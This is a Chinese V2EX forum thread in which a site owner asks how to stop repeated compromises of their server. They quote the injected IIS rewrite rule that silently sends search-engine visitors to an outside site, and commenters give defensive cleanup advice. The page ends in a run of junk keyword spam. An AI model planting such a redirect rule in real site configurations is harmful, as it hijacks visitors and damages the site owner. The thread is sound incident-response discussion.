高手救命,最近网站总是被挂码,怎么办? - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
weipt
V2EX    问与答

高手救命,最近网站总是被挂码,怎么办?

  •  
  •   weipt 2018-10-27 20:54:38 +08:00 3199 次点击
    这是一个创建于 2613 天前的主题,其中的信息可能已经有所发展或是发生改变。

    网站被挂码,现象是他修改配置文件,只要是从百度等搜索引擎来的,全都直接转向它们的网站了,直接打开我们的域名没有问题。用安全狗已经把补丁打了,也扫描监控开启了。 同服务器有 pageadmin 一个 cms 系统和一个老旧的 asp 网站。还有自己用 vs2018 写的一个 framework4.5 的博客系统。 会是这两个系统的后门或漏洞导致被攻击吗?有什么办法可以彻底杜绝?

    6 条回复    2018-10-28 10:08:54 +08:00
    weipt
        1
    weipt  
    OP
       2018-10-27 21:08:37 +08:00
    配置文件被加入以下代码
    <rewrite>
    <rules>
    <rule name="*">
    <match url="^(.*)$" />
    <conditions logicalGrouping="MatchAny">
    <add input="{HTTP_USER_AGENT}" pattern="baidu|so|sogou|360|sm|yisou|uc|haosou" />
    <add input="{HTTP_REFERER}" pattern="baidu|so|sogou|360|sm|yisou|uc|haosou" />
    </conditions>
    <action type="Redirect" url="http://www.38dgs.com/{R:0}" redirectType="Permanent" />
    </rule>
    </rules>
    </rewrite>
    yidinghe
        2
    yidinghe  
       2018-10-27 21:23:06 +08:00 via Android
    增加 root 的登录安全性,用非 root 来启动服务,该用户不允许修改配置文件。
    zy65334
        3
    zy65334  
       2018-10-28 00:18:25 +08:00   1
    给你几个建议:
    1.先用安全狗扫描服务器上几个 web 站点,看有不有木马,特别是在 upload 目录下,是否有其他木马。
    2.保存木马样本名称,通过几个网站的 web 日志分析查找 post 记录。
    3.查看操作系统下面注册表是否有多余的系统管理员账号。
    zy65334
        4
    zy65334  
       2018-10-28 00:20:43 +08:00
    如果有 POST 记录多半就是从那个地方入手的
    t6attack
        5
    t6attack  
       2018-10-28 01:54:19 +08:00   2
    如果已经被提权成功过。那就不是两个网站层面的问题了。只把漏洞补上可能解决不了问题。
    以前的技术是通过加载恶意驱动驻留系统、隐藏后门。 现在的技术是 bootkit (类似 隐蜂、暗云Ⅲ 的技术)。
    具体要看黑客的等级如何。在你的服务器上做过什么,然后对症下药解决问题。最好是什么都没做。
    nicevar
        6
    nicevar  
       2018-10-28 10:08:54 +08:00
    个人网站?可以用 git 管理,这样留了 webshell 很容易查出来,如果留了系统后门就比较难办了,看看日志有没有被清理,检查是否有新增用户或者普通用户提权了,隔一段时间检查端口是否有异常表现,用 Process Explorer 检查各个进程的加载模块
    关于     帮助文档     自助推广系统     博客     API     FAQ     Solana     5715 人在线   最高记录 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 39ms UTC 03:12 PVG 11:12 LAX 19:12 JFK 22:12
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86